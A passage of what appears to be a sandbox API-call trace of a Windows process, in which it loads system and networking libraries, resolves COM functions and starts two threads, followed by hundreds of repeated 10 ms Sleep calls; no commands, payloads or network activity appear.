os_tid = 0x6e8 Thread: id = 38 os_tid = 0x6dc Thread: id = 39 os_tid = 0x6bc Thread: id = 40 os_tid = 0x6b8 Thread: id = 41 os_tid = 0x6b4 Thread: id = 42 os_tid = 0x6b0 Thread: id = 43 os_tid = 0x6ac Thread: id = 44 os_tid = 0x694 Thread: id = 45 os_tid = 0x690 Thread: id = 46 os_tid = 0x684 Thread: id = 47 os_tid = 0x668 Thread: id = 48 os_tid = 0x1360 [0107.822] LoadLibraryA (lpLibFileName="NTDLL") returned 0x7ffc5f810000 [0107.824] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="RtlExitUserThread") returned 0x7ffc5f86c2a0 [0107.826] RtlCreateHeap (Flags=0x1002, HeapBase=0x0, ReserveSize=0x0, CommitSize=0x0, Lock=0x0, Parameters=0x0) returned 0x440000 [0108.463] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x10) returned 0x440830 [0108.463] LoadLibraryA (lpLibFileName="user32") returned 0x7ffc5e960000 [0108.464] RtlSizeHeap (HeapHandle=0x440000, Flags=0x0, MemoryPointer=0x440830) returned 0x10 [0108.464] RtlFreeHeap (HeapHandle=0x440000, Flags=0x0, BaseAddress=0x440830) returned 1 [0108.464] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x12) returned 0x440830 [0108.464] LoadLibraryA (lpLibFileName="advapi32") returned 0x7ffc5ec20000 [0108.465] RtlSizeHeap (HeapHandle=0x440000, Flags=0x0, MemoryPointer=0x440830) returned 0x12 [0108.465] RtlFreeHeap (HeapHandle=0x440000, Flags=0x0, BaseAddress=0x440830) returned 1 [0108.465] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x10) returned 0x440830 [0108.465] LoadLibraryA (lpLibFileName="urlmon") returned 0x7ffc4e6d0000 [0108.465] RtlSizeHeap (HeapHandle=0x440000, Flags=0x0, MemoryPointer=0x440830) returned 0x10 [0108.465] RtlFreeHeap (HeapHandle=0x440000, Flags=0x0, BaseAddress=0x440830) returned 1 [0108.465] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0xf) returned 0x440830 [0108.465] LoadLibraryA (lpLibFileName="ole32") returned 0x7ffc5e3e0000 [0108.466] RtlSizeHeap (HeapHandle=0x440000, Flags=0x0, MemoryPointer=0x440830) returned 0xf [0108.466] RtlFreeHeap (HeapHandle=0x440000, Flags=0x0, BaseAddress=0x440830) returned 1 [0108.466] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x11) returned 0x440830 [0108.466] LoadLibraryA (lpLibFileName="winhttp") returned 0x7ffc57e70000 [0108.467] RtlSizeHeap (HeapHandle=0x440000, Flags=0x0, MemoryPointer=0x440830) returned 0x11 [0108.467] RtlFreeHeap (HeapHandle=0x440000, Flags=0x0, BaseAddress=0x440830) returned 1 [0108.467] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x10) returned 0x440830 [0108.467] LoadLibraryA (lpLibFileName="ws2_32") returned 0x7ffc5e740000 [0108.467] RtlSizeHeap (HeapHandle=0x440000, Flags=0x0, MemoryPointer=0x440830) returned 0x10 [0108.467] RtlFreeHeap (HeapHandle=0x440000, Flags=0x0, BaseAddress=0x440830) returned 1 [0108.467] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x10) returned 0x440830 [0108.467] LoadLibraryA (lpLibFileName="dnsapi") returned 0x7ffc5a8a0000 [0108.468] RtlSizeHeap (HeapHandle=0x440000, Flags=0x0, MemoryPointer=0x440830) returned 0x10 [0108.468] RtlFreeHeap (HeapHandle=0x440000, Flags=0x0, BaseAddress=0x440830) returned 1 [0108.468] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x11) returned 0x440830 [0108.468] LoadLibraryA (lpLibFileName="shell32") returned 0x7ffc5cc80000 [0108.469] RtlSizeHeap (HeapHandle=0x440000, Flags=0x0, MemoryPointer=0x440830) returned 0x11 [0108.469] RtlFreeHeap (HeapHandle=0x440000, Flags=0x0, BaseAddress=0x440830) returned 1 [0108.469] LoadLibraryA (lpLibFileName="api-ms-win-core-com-l1-1-0") returned 0x7ffc5f2c0000 [0108.470] GetProcAddress (hModule=0x7ffc5f2c0000, lpProcName="CoInitializeEx") returned 0x7ffc5f322c50 [0108.470] LoadLibraryA (lpLibFileName="api-ms-win-core-com-l1-1-0") returned 0x7ffc5f2c0000 [0108.471] GetProcAddress (hModule=0x7ffc5f2c0000, lpProcName="CoInitializeSecurity") returned 0x7ffc5f2f5fe0 [0108.471] LoadLibraryA (lpLibFileName="api-ms-win-core-com-l1-1-0") returned 0x7ffc5f2c0000 [0108.472] GetProcAddress (hModule=0x7ffc5f2c0000, lpProcName="CoCreateInstance") returned 0x7ffc5f35fb70 [0108.472] LoadLibraryA (lpLibFileName="api-ms-win-core-com-l1-1-0") returned 0x7ffc5f2c0000 [0108.473] GetProcAddress (hModule=0x7ffc5f2c0000, lpProcName="CoUninitialize") returned 0x7ffc5f321540 [0108.473] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x423ca4, lpParameter=0x410000, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2094 [0108.474] CloseHandle (hObject=0x2094) returned 1 [0108.474] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x423d80, lpParameter=0x410000, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2094 [0108.474] CloseHandle (hObject=0x2094) returned 1 [0108.474] Sleep (dwMilliseconds=0xa) [0108.530] Sleep (dwMilliseconds=0xa) [0108.581] Sleep (dwMilliseconds=0xa) [0108.632] Sleep (dwMilliseconds=0xa) [0108.686] Sleep (dwMilliseconds=0xa) [0108.733] Sleep (dwMilliseconds=0xa) [0108.782] Sleep (dwMilliseconds=0xa) [0108.844] Sleep (dwMilliseconds=0xa) [0109.219] Sleep (dwMilliseconds=0xa) [0109.269] Sleep (dwMilliseconds=0xa) [0109.313] Sleep (dwMilliseconds=0xa) [0109.361] Sleep (dwMilliseconds=0xa) [0109.377] Sleep (dwMilliseconds=0xa) [0109.392] Sleep (dwMilliseconds=0xa) [0109.449] Sleep (dwMilliseconds=0xa) [0109.471] Sleep (dwMilliseconds=0xa) [0109.485] Sleep (dwMilliseconds=0xa) [0109.532] Sleep (dwMilliseconds=0xa) [0109.590] Sleep (dwMilliseconds=0xa) [0109.626] Sleep (dwMilliseconds=0xa) [0109.683] Sleep (dwMilliseconds=0xa) [0109.704] Sleep (dwMilliseconds=0xa) [0109.752] Sleep (dwMilliseconds=0xa) [0109.798] Sleep (dwMilliseconds=0xa) [0109.867] Sleep (dwMilliseconds=0xa) [0109.910] Sleep (dwMilliseconds=0xa) [0109.955] Sleep (dwMilliseconds=0xa) [0110.001] Sleep (dwMilliseconds=0xa) [0110.031] Sleep (dwMilliseconds=0xa) [0110.048] Sleep (dwMilliseconds=0xa) [0110.081] Sleep (dwMilliseconds=0xa) [0110.100] Sleep (dwMilliseconds=0xa) [0110.126] Sleep (dwMilliseconds=0xa) [0110.174] Sleep (dwMilliseconds=0xa) [0110.266] Sleep (dwMilliseconds=0xa) [0110.340] Sleep (dwMilliseconds=0xa) [0110.390] Sleep (dwMilliseconds=0xa) [0110.407] Sleep (dwMilliseconds=0xa) [0110.449] Sleep (dwMilliseconds=0xa) [0110.513] Sleep (dwMilliseconds=0xa) [0110.549] Sleep (dwMilliseconds=0xa) [0110.588] Sleep (dwMilliseconds=0xa) [0110.615] Sleep (dwMilliseconds=0xa) [0110.704] Sleep (dwMilliseconds=0xa) [0110.824] Sleep (dwMilliseconds=0xa) [0110.866] Sleep (dwMilliseconds=0xa) [0110.920] Sleep (dwMilliseconds=0xa) [0110.938] Sleep (dwMilliseconds=0xa) [0110.985] Sleep (dwMilliseconds=0xa) [0111.058] Sleep (dwMilliseconds=0xa) [0111.081] Sleep (dwMilliseconds=0xa) [0111.108] Sleep (dwMilliseconds=0xa) [0111.126] Sleep (dwMilliseconds=0xa) [0111.145] Sleep (dwMilliseconds=0xa) [0111.188] Sleep (dwMilliseconds=0xa) [0111.318] Sleep (dwMilliseconds=0xa) [0111.345] Sleep (dwMilliseconds=0xa) [0111.362] Sleep (dwMilliseconds=0xa) [0111.377] Sleep (dwMilliseconds=0xa) [0111.439] Sleep (dwMilliseconds=0xa) [0111.545] Sleep (dwMilliseconds=0xa) [0111.564] Sleep (dwMilliseconds=0xa) [0111.578] Sleep (dwMilliseconds=0xa) [0111.594] Sleep (dwMilliseconds=0xa) [0111.642] Sleep (dwMilliseconds=0xa) [0111.723] Sleep (dwMilliseconds=0xa) [0111.768] Sleep (dwMilliseconds=0xa) [0111.782] Sleep (dwMilliseconds=0xa) [0111.797] Sleep (dwMilliseconds=0xa) [0111.843] Sleep (dwMilliseconds=0xa) [0111.910] Sleep (dwMilliseconds=0xa) [0111.955] Sleep (dwMilliseconds=0xa) [0111.970] Sleep (dwMilliseconds=0xa) [0111.985] Sleep (dwMilliseconds=0xa) [0112.031] Sleep (dwMilliseconds=0xa) [0112.092] Sleep (dwMilliseconds=0xa) [0112.146] Sleep (dwMilliseconds=0xa) [0112.174] Sleep (dwMilliseconds=0xa) [0112.188] Sleep (dwMilliseconds=0xa) [0112.219] Sleep (dwMilliseconds=0xa) [0112.291] Sleep (dwMilliseconds=0xa) [0112.329] Sleep (dwMilliseconds=0xa) [0112.349] Sleep (dwMilliseconds=0xa) [0112.378] Sleep (dwMilliseconds=0xa) [0112.391] Sleep (dwMilliseconds=0xa) [0112.437] Sleep (dwMilliseconds=0xa) [0112.534] Sleep (dwMilliseconds=0xa) [0112.604] Sleep (dwMilliseconds=0xa) [0112.625] Sleep (dwMilliseconds=0xa) [0112.642] Sleep (dwMilliseconds=0xa) [0112.684] Sleep (dwMilliseconds=0xa) [0112.779] Sleep (dwMilliseconds=0xa) [0112.953] Sleep (dwMilliseconds=0xa) [0112.981] Sleep (dwMilliseconds=0xa) [0112.995] Sleep (dwMilliseconds=0xa) [0113.010] Sleep (dwMilliseconds=0xa) [0113.058] Sleep (dwMilliseconds=0xa) [0113.103] Sleep (dwMilliseconds=0xa) [0113.212] Sleep (dwMilliseconds=0xa) [0113.248] Sleep (dwMilliseconds=0xa) [0113.259] Sleep (dwMilliseconds=0xa) [0113.293] Sleep (dwMilliseconds=0xa) [0113.316] Sleep (dwMilliseconds=0xa) [0113.400] Sleep (dwMilliseconds=0xa) [0113.481] Sleep (dwMilliseconds=0xa) [0113.495] Sleep (dwMilliseconds=0xa) [0113.509] Sleep (dwMilliseconds=0xa) [0113.525] Sleep (dwMilliseconds=0xa) [0113.573] Sleep (dwMilliseconds=0xa) [0113.644] Sleep (dwMilliseconds=0xa) [0113.695] Sleep (dwMilliseconds=0xa) [0113.722] Sleep (dwMilliseconds=0xa) [0113.748] Sleep (dwMilliseconds=0xa) [0113.762] Sleep (dwMilliseconds=0xa) [0113.774] Sleep (dwMilliseconds=0xa) [0113.804] Sleep (dwMilliseconds=0xa) [0113.832] Sleep (dwMilliseconds=0xa) [0113.950] Sleep (dwMilliseconds=0xa) [0113.962] Sleep (dwMilliseconds=0xa) [0113.977] Sleep (dwMilliseconds=0xa) [0113.996] Sleep (dwMilliseconds=0xa) [0114.010] Sleep (dwMilliseconds=0xa) [0114.259] Sleep (dwMilliseconds=0xa) [0114.363] Sleep (dwMilliseconds=0xa) [0114.385] Sleep (dwMilliseconds=0xa) [0114.434] Sleep (dwMilliseconds=0xa) [0114.498] Sleep (dwMilliseconds=0xa) [0114.541] Sleep (dwMilliseconds=0xa) [0114.557] Sleep (dwMilliseconds=0xa) [0114.570] Sleep (dwMilliseconds=0xa) [0114.602] Sleep (dwMilliseconds=0xa) [0114.634] Sleep (dwMilliseconds=0xa) [0114.707] Sleep (dwMilliseconds=0xa) [0114.744] Sleep (dwMilliseconds=0xa) [0114.764] Sleep (dwMilliseconds=0xa) [0114.797] Sleep (dwMilliseconds=0xa) [0114.836] Sleep (dwMilliseconds=0xa) [0114.884] Sleep (dwMilliseconds=0xa) [0114.931] Sleep (dwMilliseconds=0xa) [0114.946] Sleep (dwMilliseconds=0xa) [0114.975] Sleep (dwMilliseconds=0xa) [0115.008] Sleep (dwMilliseconds=0xa) [0115.078] Sleep (dwMilliseconds=0xa) [0115.140] Sleep (dwMilliseconds=0xa) [0115.164] Sleep (dwMilliseconds=0xa) [0115.185] Sleep (dwMilliseconds=0xa) [0115.243] Sleep (dwMilliseconds=0xa) [0115.351] Sleep (dwMilliseconds=0xa) [0115.382] Sleep (dwMilliseconds=0xa) [0115.400] Sleep (dwMilliseconds=0xa) [0115.416] Sleep (dwMilliseconds=0xa) [0115.431] Sleep (dwMilliseconds=0xa) [0115.464] Sleep (dwMilliseconds=0xa) [0115.484] Sleep (dwMilliseconds=0xa) [0115.555] Sleep (dwMilliseconds=0xa) [0115.668] Sleep (dwMilliseconds=0xa) [0115.694] Sleep (dwMilliseconds=0xa) [0115.713] Sleep (dwMilliseconds=0xa) [0115.730] Sleep (dwMilliseconds=0xa) [0115.764] Sleep (dwMilliseconds=0xa) [0115.868] Sleep (dwMilliseconds=0xa) [0115.992] Sleep (dwMilliseconds=0xa) [0116.018] Sleep (dwMilliseconds=0xa) [0116.057] Sleep (dwMilliseconds=0xa) [0116.100] Sleep (dwMilliseconds=0xa) [0116.165] Sleep (dwMilliseconds=0xa) [0116.180] Sleep (dwMilliseconds=0xa) [0116.234] Sleep (dwMilliseconds=0xa) [0116.352] Sleep (dwMilliseconds=0xa) [0116.412] Sleep (dwMilliseconds=0xa) [0116.431] Sleep (dwMilliseconds=0xa) [0116.476] Sleep (dwMilliseconds=0xa) [0116.509] Sleep (dwMilliseconds=0xa) [0116.605] Sleep (dwMilliseconds=0xa) [0116.712] Sleep (dwMilliseconds=0xa) [0116.758] Sleep (dwMilliseconds=0xa) [0116.807] Sleep (dwMilliseconds=0xa) [0116.839] Sleep (dwMilliseconds=0xa) [0116.859] Sleep (dwMilliseconds=0xa) [0116.883] Sleep (dwMilliseconds=0xa) [0116.907] Sleep (dwMilliseconds=0xa) [0116.946] Sleep (dwMilliseconds=0xa) [0117.074] Sleep (dwMilliseconds=0xa) [0117.127] Sleep (dwMilliseconds=0xa) [0117.153] Sleep (dwMilliseconds=0xa) [0117.167] Sleep (dwMilliseconds=0xa) [0117.186] Sleep (dwMilliseconds=0xa) [0117.258] Sleep (dwMilliseconds=0xa) [0117.339] Sleep (dwMilliseconds=0xa) [0117.428] Sleep (dwMilliseconds=0xa) [0117.493] Sleep (dwMilliseconds=0xa) [0117.535] Sleep (dwMilliseconds=0xa) [0117.556] Sleep (dwMilliseconds=0xa) [0117.635] Sleep (dwMilliseconds=0xa) [0117.665] Sleep (dwMilliseconds=0xa) [0117.787] Sleep (dwMilliseconds=0xa) [0117.973] Sleep (dwMilliseconds=0xa) [0118.012] Sleep (dwMilliseconds=0xa) [0118.061] Sleep (dwMilliseconds=0xa) [0118.174] Sleep (dwMilliseconds=0xa) [0118.223] Sleep (dwMilliseconds=0xa) [0118.248] Sleep (dwMilliseconds=0xa) [0118.261] Sleep (dwMilliseconds=0xa) [0118.287] Sleep (dwMilliseconds=0xa) [0118.325] Sleep (dwMilliseconds=0xa) [0118.418] Sleep (dwMilliseconds=0xa) [0118.528] Sleep (dwMilliseconds=0xa) [0118.542] Sleep (dwMilliseconds=0xa) [0118.562] Sleep (dwMilliseconds=0xa) [0118.605] Sleep (dwMilliseconds=0xa) [0118.631] Sleep (dwMilliseconds=0xa) [0118.697] Sleep (dwMilliseconds=0xa) [0118.781] Sleep (dwMilliseconds=0xa) [0118.892] Sleep (dwMilliseconds=0xa) [0118.921] Sleep (dwMilliseconds=0xa) [0118.940] Sleep (dwMilliseconds=0xa) [0118.995] Sleep (dwMilliseconds=0xa) [0119.012] Sleep (dwMilliseconds=0xa) [0119.061] Sleep (dwMilliseconds=0xa) [0119.164] Sleep (dwMilliseconds=0xa) [0119.229] Sleep (dwMilliseconds=0xa) [0119.245] Sleep (dwMilliseconds=0xa) [0119.262] Sleep (dwMilliseconds=0xa) [0119.282] Sleep (dwMilliseconds=0xa) [0119.309] Sleep (dwMilliseconds=0xa) [0119.386] Sleep (dwMilliseconds=0xa) [0119.467] Sleep (dwMilliseconds=0xa) [0119.489] Sleep (dwMilliseconds=0xa) [0119.517] Sleep (dwMilliseconds=0xa) [0119.560] Sleep (dwMilliseconds=0xa) [0119.636] Sleep (dwMilliseconds=0xa) [0119.694] Sleep (dwMilliseconds=0xa) [0119.715] Sleep (dwMilliseconds=0xa) [0119.734] Sleep (dwMilliseconds=0xa) [0119.745] Sleep (dwMilliseconds=0xa) [0119.769] Sleep (dwMilliseconds=0xa) [0119.795] Sleep (dwMilliseconds=0xa) [0119.841] Sleep (dwMilliseconds=0xa) [0119.955] Sleep (dwMilliseconds=0xa) [0120.167] Sleep (dwMilliseconds=0xa) [0120.238] Sleep (dwMilliseconds=0xa) [0120.282] Sleep (dwMilliseconds=0xa) [0120.326] Sleep (dwMilliseconds=0xa) [0120.359] Sleep (dwMilliseconds=0xa) [0120.374] Sleep (dwMilliseconds=0xa) [0120.390] Sleep (dwMilliseconds=0xa) [0120.417] Sleep (dwMilliseconds=0xa) [0120.435] Sleep (dwMilliseconds=0xa) [0120.464] Sleep (dwMilliseconds=0xa) [0120.576] Sleep (dwMilliseconds=0xa) [0120.713] Sleep (dwMilliseconds=0xa) [0120.772] Sleep (dwMilliseconds=0xa) [0120.812] Sleep (dwMilliseconds=0xa) [0120.844] Sleep (dwMilliseconds=0xa) [0120.871] Sleep (dwMilliseconds=0xa) [0120.901] Sleep (dwMilliseconds=0xa) [0120.995] Sleep (dwMilliseconds=0xa) [0121.088] Sleep (dwMilliseconds=0xa) [0121.107] Sleep (dwMilliseconds=0xa) [0121.120] Sleep (dwMilliseconds=0xa) [0121.146] Sleep (dwMilliseconds=0xa) [0121.179] Sleep (dwMilliseconds=0xa) [0121.244] Sleep (dwMilliseconds=0xa) [0121.281] Sleep (dwMilliseconds=0xa) [0121.292] Sleep (dwMilliseconds=0xa) [0121.309] Sleep (dwMilliseconds=0xa) [0121.356] Sleep (dwMilliseconds=0xa) [0121.433] Sleep (dwMilliseconds=0xa) [0121.487] Sleep (dwMilliseconds=0xa) [0121.513] Sleep (dwMilliseconds=0xa) [0121.528] Sleep (dwMilliseconds=0xa) [0121.542] Sleep (dwMilliseconds=0xa) [0121.559] Sleep (dwMilliseconds=0xa) [0121.573] Sleep (dwMilliseconds=0xa) [0121.626] Sleep (dwMilliseconds=0xa) [0121.753] Sleep (dwMilliseconds=0xa) [0121.787] Sleep (dwMilliseconds=0xa) [0121.810] Sleep (dwMilliseconds=0xa) [0121.824] Sleep (dwMilliseconds=0xa) [0121.843] Sleep (dwMilliseconds=0xa) [0121.870] Sleep (dwMilliseconds=0xa) [0121.994] Sleep (dwMilliseconds=0xa) [0122.011] Sleep (dwMilliseconds=0xa) [0122.027] Sleep (dwMilliseconds=0xa) [0122.044] Sleep (dwMilliseconds=0xa) [0122.066] Sleep (dwMilliseconds=0xa) [0122.121] Sleep (dwMilliseconds=0xa) [0122.247] Sleep (dwMilliseconds=0xa) [0122.262] Sleep (dwMilliseconds=0xa) [0122.276] Sleep (dwMilliseconds=0xa) [0122.293] Sleep (dwMilliseconds=0xa) [0122.310] Sleep (dwMilliseconds=0xa) [0122.386] Sleep (dwMilliseconds=0xa) [0122.480] Sleep (dwMilliseconds=0xa) [0122.496] Sleep (dwMilliseconds=0xa) [0122.515] Sleep (dwMilliseconds=0xa) [0122.540] Sleep (dwMilliseconds=0xa) [0122.575] Sleep (dwMilliseconds=0xa) [0122.658] Sleep (dwMilliseconds=0xa) [0122.707] Sleep (dwMilliseconds=0xa) [0122.734] Sleep (dwMilliseconds=0xa) [0122.761] Sleep (dwMilliseconds=0xa) [0122.777] Sleep (dwMilliseconds=0xa) [0122.854] Sleep (dwMilliseconds=0xa) [0122.980] Sleep (dwMilliseconds=0xa) [0122.995] Sleep (dwMilliseconds=0xa) [0123.011] Sleep (dwMilliseconds=0xa) [0123.026] Sleep (dwMilliseconds=0xa) [0123.076] Sleep (dwMilliseconds=0xa) [0123.200] Sleep (dwMilliseconds=0xa) [0123.239] Sleep (dwMilliseconds=0xa) [0123.266] Sleep (dwMilliseconds=0xa) [0123.293] Sleep (dwMilliseconds=0xa) [0123.339] Sleep (dwMilliseconds=0xa) [0123.406] Sleep (dwMilliseconds=0xa) [0123.449] Sleep (dwMilliseconds=0xa) [0123.464] Sleep (dwMilliseconds=0xa) [0123.516] Sleep (dwMilliseconds=0xa) [0123.574] Sleep (dwMilliseconds=0xa) [0123.691] Sleep (dwMilliseconds=0xa) [0123.715] Sleep (dwMilliseconds=0xa) [0123.731] Sleep (dwMilliseconds=0xa) [0123.767] Sleep (dwMilliseconds=0xa) [0123.813] Sleep (dwMilliseconds=0xa) [0123.941] Sleep (dwMilliseconds=0xa) [0123.962] Sleep (dwMilliseconds=0xa) [0123.976] Sleep (dwMilliseconds=0xa) [0123.988] Sleep (dwMilliseconds=0xa) [0124.016] Sleep (dwMilliseconds=0xa) [0124.041] Sleep (dwMilliseconds=0xa) [0124.120] Sleep (dwMilliseconds=0xa) [0124.168] Sleep (dwMilliseconds=0xa) [0124.181] Sleep (dwMilliseconds=0xa) [0124.224] Sleep (dwMilliseconds=0xa) [0124.244] Sleep (dwMilliseconds=0xa) [0124.291] Sleep (dwMilliseconds=0xa) [0124.403] Sleep (dwMilliseconds=0xa) [0124.418] Sleep (dwMilliseconds=0xa) [0124.462] Sleep (dwMilliseconds=0xa) [0124.485] Sleep (dwMilliseconds=0xa) [0124.510] Sleep (dwMilliseconds=0xa) [0124.595] Sleep (dwMilliseconds=0xa) [0124.637] Sleep (dwMilliseconds=0xa) [0124.652] Sleep (dwMilliseconds=0xa) [0124.666] Sleep (dwMilliseconds=0xa) [0124.706] Sleep (dwMilliseconds=0xa) [0124.730] Sleep (dwMilliseconds=0xa) [0124.837] Sleep (dwMilliseconds=0xa) [0124.902] Sleep (dwMilliseconds=0xa) [0124.932] Sleep (dwMilliseconds=0xa) [0124.951] Sleep (dwMilliseconds=0xa) [0124.983] Sleep (dwMilliseconds=0xa) [0125.051] Sleep (dwMilliseconds=0xa) [0125.172] Sleep (dwMilliseconds=0xa) [0125.223] Sleep (dwMilliseconds=0xa) [0125.243] Sleep (dwMilliseconds=0xa) [0125.293] Sleep (dwMilliseconds=0xa) [0125.424] Sleep (dwMilliseconds=0xa) [0125.448] Sleep (dwMilliseconds=0xa) [0125.470] Sleep (dwMilliseconds=0xa) [0125.526] Sleep (dwMilliseconds=0xa) [0125.635] Sleep (dwMilliseconds=0xa) [0125.652] Sleep (dwMilliseconds=0xa) [0125.666] Sleep (dwMilliseconds=0xa) [0125.682] Sleep (dwMilliseconds=0xa) [0125.728] Sleep (dwMilliseconds=0xa) [0125.823] Sleep (dwMilliseconds=0xa) [0126.027] Sleep (dwMilliseconds=0xa) [0126.071] Sleep (dwMilliseconds=0xa) [0126.231] Sleep (dwMilliseconds=0xa) [0126.287] Sleep (dwMilliseconds=0xa) [0126.320] Sleep (dwMilliseconds=0xa) [0126.345] Sleep (dwMilliseconds=0xa) [0126.401] Sleep (dwMilliseconds=0xa) [0126.469] Sleep (dwMilliseconds=0xa) [0126.527] Sleep (dwMilliseconds=0xa) [0126.556] Sleep (dwMilliseconds=0xa) [0126.573] Sleep (dwMilliseconds=0xa) [0126.589] Sleep (dwMilliseconds=0xa) [0126.604] Sleep (dwMilliseconds=0xa) [0126.637] Sleep (dwMilliseconds=0xa) [0126.682] Sleep (dwMilliseconds=0xa) [0126.755] Sleep (dwMilliseconds=0xa) [0126.779] Sleep (dwMilliseconds=0xa) [0126.794] Sleep (dwMilliseconds=0xa) [0126.821] Sleep (dwMilliseconds=0xa) [0126.869] Sleep (dwMilliseconds=0xa) [0126.932] Sleep (dwMilliseconds=0xa) [0127.001] Sleep (dwMilliseconds=0xa) [0127.030] Sleep (dwMilliseconds=0xa) [0127.061] Sleep (dwMilliseconds=0xa) [0127.230] Sleep (dwMilliseconds=0xa) [0127.324] Sleep (dwMilliseconds=0xa) [0127.381] Sleep (dwMilliseconds=0xa) [0127.449] Sleep (dwMilliseconds=0xa) [0127.480] Sleep (dwMilliseconds=0xa) [0127.528] Sleep (dwMilliseconds=0xa) [0127.560] Sleep (dwMilliseconds=0xa) [0127.573] Sleep (dwMilliseconds=0xa) [0127.617] Sleep (dwMilliseconds=0xa) [0127.676] Sleep (dwMilliseconds=0xa) [0127.722] Sleep (dwMilliseconds=0xa) [0127.756] Sleep (dwMilliseconds=0xa) [0127.775] Sleep (dwMilliseconds=0xa) [0127.792] Sleep (dwMilliseconds=0xa) [0127.813] Sleep (dwMilliseconds=0xa) [0127.958] Sleep (dwMilliseconds=0xa) [0128.096] Sleep (dwMilliseconds=0xa) [0128.201] Sleep (dwMilliseconds=0xa) [0128.264] Sleep (dwMilliseconds=0xa) [0128.334] Sleep (dwMilliseconds=0xa) [0128.363] Sleep (dwMilliseconds=0xa) [0128.377] Sleep (dwMilliseconds=0xa) [0128.407] Sleep (dwMilliseconds=0xa) [0128.442] Sleep (dwMilliseconds=0xa) [0128.485] Sleep (dwMilliseconds=0xa) [0128.579] Sleep (dwMilliseconds=0xa) [0128.624] Sleep (dwMilliseconds=0xa) [0128.652] Sleep (dwMilliseconds=0xa) [0128.674] Sleep (dwMilliseconds=0xa) [0128.692] Sleep (dwMilliseconds=0xa) [0128.733] Sleep (dwMilliseconds=0xa) [0128.813] Sleep (dwMilliseconds=0xa) [0128.892] Sleep (dwMilliseconds=0xa) [0128.915] Sleep (dwMilliseconds=0xa) [0128.939] Sleep (dwMilliseconds=0xa) [0128.957] Sleep (dwMilliseconds=0xa) [0129.002] Sleep (dwMilliseconds=0xa) [0129.021] Sleep (dwMilliseconds=0xa) [0129.041] Sleep (dwMilliseconds=0xa) [0129.079] Sleep (dwMilliseconds=0xa) [0129.163] Sleep (dwMilliseconds=0xa) [0131.381] Sleep (dwMilliseconds=0xa) [0131.432] Sleep (dwMilliseconds=0xa) [0131.459] Sleep (dwMilliseconds=0xa) [0131.474] Sleep (dwMilliseconds=0xa) [0131.486] Sleep (dwMilliseconds=0xa) [0131.502] Sleep (dwMilliseconds=0xa) [0131.521] Sleep (dwMilliseconds=0xa) [0131.548] Sleep (dwMilliseconds=0xa) [0131.685] Sleep (dwMilliseconds=0xa) [0131.705] Sleep (dwMilliseconds=0xa) [0131.728] Sleep (dwMilliseconds=0xa) [0131.783] Sleep (dwMilliseconds=0xa) [0131.830] Sleep (dwMilliseconds=0xa) [0131.923] Sleep (dwMilliseconds=0xa) [0131.977] Sleep (dwMilliseconds=0xa) [0132.001] Sleep (dwMilliseconds=0xa) [0132.016] Sleep (dwMilliseconds=0xa) [0132.063] Sleep (dwMilliseconds=0xa) [0132.149] Sleep (dwMilliseconds=0xa) [0132.173] Sleep (dwMilliseconds=0xa) [0132.230] Sleep (dwMilliseconds=0xa) [0132.272] Sleep (dwMilliseconds=0xa) [0132.314] Sleep (dwMilliseconds=0xa) [0132.338] Sleep (dwMilliseconds=0xa) [0132.370] Sleep (dwMilliseconds=0xa) [0132.489] Sleep (dwMilliseconds=0xa) [0132.669] Sleep (dwMilliseconds=0xa) [0132.720] Sleep (dwMilliseconds=0xa) [0132.753] Sleep (dwMilliseconds=0xa) [0132.796] Sleep (dwMilliseconds=0xa) [0132.916] Sleep (dwMilliseconds=0xa) [0132.953] Sleep (dwMilliseconds=0xa) [0132.987] Sleep (dwMilliseconds=0xa) [0133.013] Sleep (dwMilliseconds=0xa) [0133.026] Sleep (dwMilliseconds=0xa) [0133.044] Sleep (dwMilliseconds=0xa) [0133.072] Sleep (dwMilliseconds=0xa) [0133.168] Sleep (dwMilliseconds=0xa) [0133.294] Sleep (dwMilliseconds=0xa) [0133.323] Sleep (dwMilliseconds=0xa) [0133.370] Sleep (dwMilliseconds=0xa) [0133.407] Sleep (dwMilliseconds=0xa) [0133.443] Sleep (dwMilliseconds=0xa) [0133.469] Sleep (dwMilliseconds=0xa) [0133.506] Sleep (dwMilliseconds=0xa) [0133.603] Sleep (dwMilliseconds=0xa) [0133.648] Sleep (dwMilliseconds=0xa) [0133.665] Sleep (dwMilliseconds=0xa) [0133.698] Sleep (dwMilliseconds=0xa) [0133.730] Sleep (dwMilliseconds=0xa) [0133.775] Sleep (dwMilliseconds=0xa) [0133.856] Sleep (dwMilliseconds=0xa) [0133.886] Sleep (dwMilliseconds=0xa) [0133.909] Sleep (dwMilliseconds=0xa) [0133.932] Sleep (dwMilliseconds=0xa) [0133.957] Sleep (dwMilliseconds=0xa) [0134.055] Sleep (dwMilliseconds=0xa) [0134.099] Sleep (dwMilliseconds=0xa) [0134.118] Sleep (dwMilliseconds=0xa) [0134.135] Sleep (dwMilliseconds=0xa) [0134.150] Sleep (dwMilliseconds=0xa) [0134.189] Sleep (dwMilliseconds=0xa) [0134.273] Sleep (dwMilliseconds=0xa) [0134.339] Sleep (dwMilliseconds=0xa) [0134.373] Sleep (dwMilliseconds=0xa) [0134.385] Sleep (dwMilliseconds=0xa) [0134.418] Sleep (dwMilliseconds=0xa) [0134.464] Sleep (dwMilliseconds=0xa) [0134.479] Sleep (dwMilliseconds=0xa) [0134.525] Sleep (dwMilliseconds=0xa) [0134.548] Sleep (dwMilliseconds=0xa) [0134.574] Sleep (dwMilliseconds=0xa) [0134.588] Sleep (dwMilliseconds=0xa) [0134.637] Sleep (dwMilliseconds=0xa) [0134.683] Sleep (dwMilliseconds=0xa) [0134.774] Sleep (dwMilliseconds=0xa) [0134.813] Sleep 